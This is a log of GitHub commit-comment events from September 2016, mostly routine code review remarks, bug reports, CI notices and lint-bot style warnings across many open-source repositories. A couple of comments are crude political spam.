{"id":"4560549282","type":"CommitCommentEvent","actor":{"login":"sergiolozano98"},"repo":{"name":"sergiolozano98/ED"},"payload":{"comment":{"id":19014415,"position":3,"line":3,"path":"index.php","commit_id":"4c0111a0c7779a06361937932c389279dc928e84","created_at":"2016-09-14T08:28:21Z","updated_at":"2016-09-14T08:28:21Z","body":"fkjfj"}},"created_at":"2016-09-14T08:28:21Z"}
{"id":"4560549412","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"googlei18n/fontview"},"payload":{"comment":{"id":19014416,"position":null,"line":null,"path":null,"commit_id":"deed40c095ef09f2348f0c0fcefbeeb1bf3d8a40","created_at":"2016-09-14T08:28:23Z","updated_at":"2016-09-14T08:28:23Z","body":"Cool!\r\nHowever, it doesn't work with /Library/Fonts/Skia.ttf any more... (Skia v10.0d4e1 from Yosemite)\r\nI tried both the pre-compiled app, and compiling from source."}},"created_at":"2016-09-14T08:28:23Z"}
{"id":"4560550270","type":"CommitCommentEvent","actor":{"login":"wallon-ines"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19014420,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T08:28:34Z","updated_at":"2016-09-14T08:28:34Z","body":"Hi,\r\n\r\nI tested 3.1 and it should work in 3.3"}},"created_at":"2016-09-14T08:28:34Z"}
{"id":"4560553989","type":"CommitCommentEvent","actor":{"login":"droidmjt"},"repo":{"name":"droidmjt/Droidsound"},"payload":{"comment":{"id":19014435,"position":null,"line":null,"path":null,"commit_id":"2f0f0beee28aa22a76ea3a6e6799ad5d90595185","created_at":"2016-09-14T08:29:25Z","updated_at":"2016-09-14T08:29:25Z","body":"No I didn't add."}},"created_at":"2016-09-14T08:29:25Z"}
{"id":"4560555564","type":"CommitCommentEvent","actor":{"login":"xws-bench"},"repo":{"name":"xws-bench/bench"},"payload":{"comment":{"id":19014438,"position":68,"line":3097,"path":"src/units.js","commit_id":"1e6eaaed230732d7110fd66ad906c047f873ce78","created_at":"2016-09-14T08:29:46Z","updated_at":"2016-09-14T08:29:46Z","body":"That's the problem with displaying firing buttons (selecting a weapon for an attack). The goal is to select a different unit, during combat, and if it \"can fire\", display the correct buttons. The first conditions (in red) were not correct, because even if the PS of the unit is different from the PS of the firing units (skillturn), this unit can still fire sometimes (Dengar for instance). This correction was not sufficient. A unit must be able to fire, and no action is pending (like actions triggered at the beginning of the combat phase). "}},"created_at":"2016-09-14T08:29:46Z"}
{"id":"4560556838","type":"CommitCommentEvent","actor":{"login":"cs13lw1"},"repo":{"name":"cs13lw1/Chess-Multiplayer"},"payload":{"comment":{"id":19014441,"position":null,"line":null,"path":null,"commit_id":"e8a55abd096aed322c8b56d1d11e3a971024c5d9","created_at":"2016-09-14T08:30:04Z","updated_at":"2016-09-14T08:30:04Z","body":"Details"}},"created_at":"2016-09-14T08:30:04Z"}
{"id":"4560556937","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19014442,"position":null,"line":null,"path":null,"commit_id":"59f14677dcb68568a263cb0803150458d0e5cabf","created_at":"2016-09-14T08:30:05Z","updated_at":"2016-09-14T08:30:05Z","body":"Removed here: https://github.com/h5p/h5p-editor-php-library/commit/4f3bce523876621513432e9777c417857bf720de"}},"created_at":"2016-09-14T08:30:05Z"}
{"id":"4560557663","type":"CommitCommentEvent","actor":{"login":"darranl"},"repo":{"name":"wildfly-security-incubator/wildfly-capabilities"},"payload":{"comment":{"id":19014444,"position":14,"line":14,"path":"org/wildfly/security/key-store/capabilities.adoc","commit_id":"b970b3b46cecb35b0dc9e7b7e55e0238ba86f1df","created_at":"2016-09-14T08:30:17Z","updated_at":"2016-09-14T08:30:17Z","body":"Yes looks like you are correct, these all need flipping to 'false'"}},"created_at":"2016-09-14T08:30:17Z"}
{"id":"4560557776","type":"CommitCommentEvent","actor":{"login":"xws-bench"},"repo":{"name":"xws-bench/bench"},"payload":{"comment":{"id":19014446,"position":null,"line":null,"path":null,"commit_id":"1e6eaaed230732d7110fd66ad906c047f873ce78","created_at":"2016-09-14T08:30:19Z","updated_at":"2016-09-14T08:30:19Z","body":"Yes, it closes it. Closed."}},"created_at":"2016-09-14T08:30:19Z"}
{"id":"4560560758","type":"CommitCommentEvent","actor":{"login":"ssj17vegeta"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19014449,"position":null,"line":null,"path":null,"commit_id":"8dc19ac21d1d8a33a53fee873e7d19a153ea8a67","created_at":"2016-09-14T08:30:57Z","updated_at":"2016-09-14T08:30:57Z","body":"Nice one :) Can't get enough of getting rid of those nasty C-style casts ^^"}},"created_at":"2016-09-14T08:30:57Z"}
{"id":"4560564292","type":"CommitCommentEvent","actor":{"login":"KianWilliam"},"repo":{"name":"KianWilliam/Pyramid-of-Giza"},"payload":{"comment":{"id":19014461,"position":null,"line":null,"path":null,"commit_id":"9ff9a44f0ca731584034ba4358051865ff3efbeb","created_at":"2016-09-14T08:31:42Z","updated_at":"2016-09-14T08:31:42Z","body":"Moses against Pharoa"}},"created_at":"2016-09-14T08:31:42Z"}
{"id":"4560564495","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014462,"position":77,"line":77,"path":"app/code/community/Adyen/Payment/controllers/ApplePayController.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:31:44Z","updated_at":"2016-09-14T08:31:44Z","body":"done"}},"created_at":"2016-09-14T08:31:44Z"}
{"id":"4560564776","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19014463,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T08:31:48Z","updated_at":"2016-09-14T08:31:48Z","body":"I had a suggestion but the patch got merged before i could discuss it. \r\nAnyways here are the little changes in the original patch..\r\n\r\nhttps://github.com/SAOSP-N/platform_packages_apps_Settings/commit/1f98a4e6003c8dea536e4777551aea25234670a0"}},"created_at":"2016-09-14T08:31:48Z"}
{"id":"4560566156","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19014464,"position":null,"line":null,"path":null,"commit_id":"f2e179752d631fa717594457dce3aa2dd9667a2b","created_at":"2016-09-14T08:32:08Z","updated_at":"2016-09-14T08:32:08Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35334/testReport/) for this commit**"}},"created_at":"2016-09-14T08:32:08Z"}
{"id":"4560566339","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014465,"position":203,"line":203,"path":"app/code/community/Adyen/Payment/controllers/ApplePayController.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:32:10Z","updated_at":"2016-09-14T08:32:10Z","body":"yes, will change to []"}},"created_at":"2016-09-14T08:32:10Z"}
{"id":"4560566517","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014466,"position":null,"line":null,"path":null,"commit_id":"081849e5e33f4940ac0d53bb42a46c4853d80cc4","created_at":"2016-09-14T08:32:12Z","updated_at":"2016-09-14T08:32:12Z","body":"Related to: backdrop/backdrop-issues#2169 "}},"created_at":"2016-09-14T08:32:12Z"}
{"id":"4560568074","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014470,"position":null,"line":null,"path":null,"commit_id":"fd40a3ed95a9b43eb4d268a4e7269243970cfdab","created_at":"2016-09-14T08:32:32Z","updated_at":"2016-09-14T08:32:32Z","body":"Related to: backdrop/backdrop-issues#2169 "}},"created_at":"2016-09-14T08:32:32Z"}
{"id":"4560568120","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014471,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T08:32:32Z","updated_at":"2016-09-14T08:32:32Z","body":"When this API was added in 2015 it wasn't supported by any browser... Browsers now are implementing it so I guess splitting it into the supported and unsupported features is a maintenance burden."}},"created_at":"2016-09-14T08:32:32Z"}
{"id":"4560569504","type":"CommitCommentEvent","actor":{"login":"waiter89"},"repo":{"name":"01org/libyami"},"payload":{"comment":{"id":19014472,"position":null,"line":null,"path":null,"commit_id":"e0a5f44da3c08637e0833eb0e32e1c284c90dc11","created_at":"2016-09-14T08:32:51Z","updated_at":"2016-09-14T08:32:51Z","body":"Thanks,it works!"}},"created_at":"2016-09-14T08:32:51Z"}
{"id":"4560570036","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014474,"position":39,"line":39,"path":"app/design/adminhtml/default/default/template/adyen/info/apple_pay.phtml","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:32:58Z","updated_at":"2016-09-14T08:32:58Z","body":"is a test/live check. Could make this a config variable."}},"created_at":"2016-09-14T08:32:58Z"}
{"id":"4560573438","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014480,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T08:33:45Z","updated_at":"2016-09-14T08:33:45Z","body":"Mazi: why don't you try do port it? It's not that hard."}},"created_at":"2016-09-14T08:33:45Z"}
{"id":"4560576748","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014486,"position":3,"line":3,"path":"app/design/frontend/base/default/template/adyen/apple_pay.phtml","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:34:30Z","updated_at":"2016-09-14T08:34:30Z","body":"true, will look into it."}},"created_at":"2016-09-14T08:34:30Z"}
{"id":"4560581731","type":"CommitCommentEvent","actor":{"login":"tokuhirom"},"repo":{"name":"tokuhirom/Module-Build-Pluggable-XSUtil"},"payload":{"comment":{"id":19014498,"position":null,"line":null,"path":null,"commit_id":"f173210835b0a38652f488f7ae10862b0edc7d4b","created_at":"2016-09-14T08:35:35Z","updated_at":"2016-09-14T08:35:35Z","body":"oops. i released this. thanks."}},"created_at":"2016-09-14T08:35:35Z"}
{"id":"4560583653","type":"CommitCommentEvent","actor":{"login":"HuZai"},"repo":{"name":"HuZai/secooUI"},"payload":{"comment":{"id":19014506,"position":null,"line":null,"path":null,"commit_id":"92e66a90a192ebea005b8d18bcd52123217fc6e3","created_at":"2016-09-14T08:36:01Z","updated_at":"2016-09-14T08:36:01Z","body":"base 下 scss 公用设置 提取 以及 tap 组件 增补"}},"created_at":"2016-09-14T08:36:01Z"}
{"id":"4560584729","type":"CommitCommentEvent","actor":{"login":"Laizerox"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19014507,"position":null,"line":null,"path":null,"commit_id":"8dc19ac21d1d8a33a53fee873e7d19a153ea8a67","created_at":"2016-09-14T08:36:16Z","updated_at":"2016-09-14T08:36:16Z","body":"@ssj17vegeta since C++11 theres excplicit type cast (Old C Style cast) which does interesting things. Only cast it doednt cover is dynamic_cast"}},"created_at":"2016-09-14T08:36:16Z"}
{"id":"4560585443","type":"CommitCommentEvent","actor":{"login":"ishmaelt3"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19014508,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T08:36:25Z","updated_at":"2016-09-14T08:36:25Z","body":"thanks for the response, I have implemented it on 3.3 and not coming right,  will you be able to assist me?"}},"created_at":"2016-09-14T08:36:25Z"}
{"id":"4560585573","type":"CommitCommentEvent","actor":{"login":"katylouise"},"repo":{"name":"ukpds/data-driven"},"payload":{"comment":{"id":19014509,"position":null,"line":null,"path":null,"commit_id":"3dfa18706bfcdf4d0ece923ec7cd22ee0ee2375a","created_at":"2016-09-14T08:36:26Z","updated_at":"2016-09-14T08:36:26Z","body":"Thanks, I'll change that."}},"created_at":"2016-09-14T08:36:26Z"}
{"id":"4560588902","type":"CommitCommentEvent","actor":{"login":"mjh1999"},"repo":{"name":"mjh1999/TG_bot"},"payload":{"comment":{"id":19014517,"position":2,"line":235,"path":"bot/seedbot.lua","commit_id":"57ee3a19952ccf1b20b7ad66bd586db0f7171491","created_at":"2016-09-14T08:37:10Z","updated_at":"2016-09-14T08:37:10Z","body":"125593689"}},"created_at":"2016-09-14T08:37:10Z"}
{"id":"4560590920","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19014519,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T08:37:34Z","updated_at":"2016-09-14T08:37:34Z","body":"Perfect! I build successfully! thanks @m-kuhn !"}},"created_at":"2016-09-14T08:37:34Z"}
{"id":"4560592183","type":"CommitCommentEvent","actor":{"login":"ilteroi"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19014522,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T08:37:52Z","updated_at":"2016-09-14T08:37:52Z","body":"so what is the fabled MP fix here? bDontShowRewardPopup?"}},"created_at":"2016-09-14T08:37:52Z"}
{"id":"4560593244","type":"CommitCommentEvent","actor":{"login":"Nashatyrev"},"repo":{"name":"ethereum/ethereumj"},"payload":{"comment":{"id":19014527,"position":10,"line":23,"path":"ethereumj-core/src/main/java/org/ethereum/solidity/compiler/SolidityCompiler.java","commit_id":"2abfe661f6a0745c092192e3525945a7586ad9e0","created_at":"2016-09-14T08:38:06Z","updated_at":"2016-09-14T08:38:06Z","body":"Here the static instance was always created (not depending on using it)"}},"created_at":"2016-09-14T08:38:06Z"}
{"id":"4560595228","type":"CommitCommentEvent","actor":{"login":"mary-kate"},"repo":{"name":"Brickimedia/LocalSettings"},"payload":{"comment":{"id":19014528,"position":null,"line":null,"path":null,"commit_id":"f71c8f1be0322b0c8ab4dcbf7ffdefa7c4e6572f","created_at":"2016-09-14T08:38:30Z","updated_at":"2016-09-14T08:38:30Z","body":"@SamanthaNguyen Please revert. This is mostly broken, because:\r\n\r\n1. save for the `$wgArticlePath` definition and the commented-out `$wgCaptchaDirectory` definition, all the double quotes here are both intentional and **necessary** for functionality! Without the double quotes, [$IP](https://www.mediawiki.org/wiki/Manual:$IP) in these definitions will **not** get properly expanded. $IP is a global variable and on our setup it's set to `/var/www/core`. So PHP will \"translate\" `require_once \"$IP/extensions/Echo/Echo.php\";` at run-time to `require_once \"/var/www/core/extensions/Echo/Echo.php\";` so that it knows what file to load. When you change it to single quotes (`require_once '$IP/extensions/Echo/Echo.php';`) you are telling PHP to load a file from a directory that is literally named `$IP` (but obviously since there isn't such a directory, it'll fail and you'll get fatals all over the place).\r\n2. you forgot to remove the foreach loop associated with the CAPTCHA questions (`foreach ( $arr as $key => $value ) {`, lines 89-91). Because you however _did_ remove the `$arr` variable that this foreach loop attempts to use, this will result in a bunch of annoying E_NOTICEs about undefined variables."}},"created_at":"2016-09-14T08:38:30Z"}
{"id":"4560598464","type":"CommitCommentEvent","actor":{"login":"ppescher"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19014534,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-14T08:39:13Z","updated_at":"2016-09-14T08:39:13Z","body":"I always thought the \"ignition\" signal could be obtained without problems from the so-called \"clamp-15\", which many car electronics manufacturer's refer to in their equipment manuals.\r\n\r\nDid you try to use board package v1.0.4 and see if debug_print() hangs the device?"}},"created_at":"2016-09-14T08:39:13Z"}
{"id":"4560600334","type":"CommitCommentEvent","actor":{"login":"Nashatyrev"},"repo":{"name":"ethereum/ethereumj"},"payload":{"comment":{"id":19014538,"position":13,"line":25,"path":"ethereumj-core/src/main/java/org/ethereum/solidity/compiler/SolidityCompiler.java","commit_id":"2abfe661f6a0745c092192e3525945a7586ad9e0","created_at":"2016-09-14T08:39:37Z","updated_at":"2016-09-14T08:39:37Z","body":"This way the bean was still initialized with `SystemProperties.getDefault()` since the constructor is called prior to fields autowiring."}},"created_at":"2016-09-14T08:39:37Z"}
{"id":"4560600831","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014540,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T08:39:42Z","updated_at":"2016-09-14T08:39:42Z","body":"Because I do not want to break stuff and prefer to let the expert do such work."}},"created_at":"2016-09-14T08:39:42Z"}
{"id":"4560602562","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19014545,"position":null,"line":null,"path":null,"commit_id":"9fef3e5d72fd2c1b58c2015690e548bb32baffe8","created_at":"2016-09-14T08:40:05Z","updated_at":"2016-09-14T08:40:05Z","body":"Yes, I adjusted .gitignore to ignore some of the source code directories which were not deleted when I switched branches.  Of course, now that I think of it, if you have files in those subdirectories:\r\n+emscripten\r\n +tools\r\n +include\r\nwhich are in the gh-pages branch, then that is why they were not deleted.  (but that would be confusing to be putting gh-pages content in those directories).\r\n\r\nThe .serve script is handy for running a local copy of the website with jekyll from the command-line.  The baseurl parameter needed to be cleared from _config.yml, so I added _config_dev.yml which removes it when serving locally (_config.yml is read first, and then _config_dev.yml is read, allowing parameters to be changed for the \"development\" mode).\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-14T08:40:05Z"}
{"id":"4560604009","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19014550,"position":4,"line":9,"path":"language/en.js","commit_id":"8695c00d3f2ac1f1fd20875f304ba48cb866d4c2","created_at":"2016-09-14T08:40:24Z","updated_at":"2016-09-14T08:40:24Z","body":"I guess this was done because the message beeing displayed for empty mandatory WYSIWYG-fields was something else that found in requiredProperty. But, I did change the message, and I see they now communicate the same message, so I agree with you. I will fix."}},"created_at":"2016-09-14T08:40:24Z"}
{"id":"4560605827","type":"CommitCommentEvent","actor":{"login":"kkterai"},"repo":{"name":"kkterai/seattle-events-cli-gem"},"payload":{"comment":{"id":19014555,"position":null,"line":null,"path":null,"commit_id":"25579b01225f6b2fadf78a2df4d6db5e589bce54","created_at":"2016-09-14T08:40:45Z","updated_at":"2016-09-14T08:40:45Z","body":"Also translated hard coded events #1 and #2 into code for two new Events objects."}},"created_at":"2016-09-14T08:40:45Z"}
{"id":"4560610973","type":"CommitCommentEvent","actor":{"login":"897272081"},"repo":{"name":"897272081/-qq.com"},"payload":{"comment":{"id":19014562,"position":6,"line":5,"path":"test.txt","commit_id":"246fe8f40aef0f8638d683537e18eec32bd3743a","created_at":"2016-09-14T08:41:51Z","updated_at":"2016-09-14T08:41:51Z","body":"钓鱼岛是中国的"}},"created_at":"2016-09-14T08:41:51Z"}
{"id":"4560611137","type":"CommitCommentEvent","actor":{"login":"iVovolk"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19014563,"position":8,"line":76,"path":"src/models/order/Payment.php","commit_id":"84bc9fc0ca36f287321fbfe3432223a70750226f","created_at":"2016-09-14T08:41:53Z","updated_at":"2016-09-14T08:41:53Z","body":"Учитывай, что при ORM запросе  Multilingual навесит свой Join, где помимо прочего в условиях будет `language_id`, который всегда по умолчанию берется из Multilingual. Соответсна, запрос будет по таким-то заданным тобой контекстам, но по `language_id` из Multilingual"}},"created_at":"2016-09-14T08:41:53Z"}
{"id":"4560611930","type":"CommitCommentEvent","actor":{"login":"897272081"},"repo":{"name":"897272081/-qq.com"},"payload":{"comment":{"id":19014564,"position":6,"line":5,"path":"test.txt","commit_id":"246fe8f40aef0f8638d683537e18eec32bd3743a","created_at":"2016-09-14T08:42:04Z","updated_at":"2016-09-14T08:42:04Z","body":"搜索"}},"created_at":"2016-09-14T08:42:04Z"}
{"id":"4560622254","type":"CommitCommentEvent","actor":{"login":"Snipcn"},"repo":{"name":"debloper/privacy.js"},"payload":{"comment":{"id":19014584,"position":null,"line":null,"path":null,"commit_id":"c31bf3eff48e8edda4d35f2e9568a4f2e69db701","created_at":"2016-09-14T08:44:16Z","updated_at":"2016-09-14T08:44:16Z","body":"FUCK CHIAN~! Snipcn~!!!"}},"created_at":"2016-09-14T08:44:16Z"}
{"id":"4560623601","type":"CommitCommentEvent","actor":{"login":"Snipcn"},"repo":{"name":"debloper/privacy.js"},"payload":{"comment":{"id":19014587,"position":null,"line":null,"path":null,"commit_id":"c31bf3eff48e8edda4d35f2e9568a4f2e69db701","created_at":"2016-09-14T08:44:31Z","updated_at":"2016-09-14T08:44:31Z","body":"FUCK CHINA~! Snipcn~!!!"}},"created_at":"2016-09-14T08:44:31Z"}
{"id":"4560629001","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19014597,"position":null,"line":null,"path":null,"commit_id":"569f0fb794b68cb41eb05cd28cd01a162600c98a","created_at":"2016-09-14T08:45:42Z","updated_at":"2016-09-14T08:45:42Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_average_nltt.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L14) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L24) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 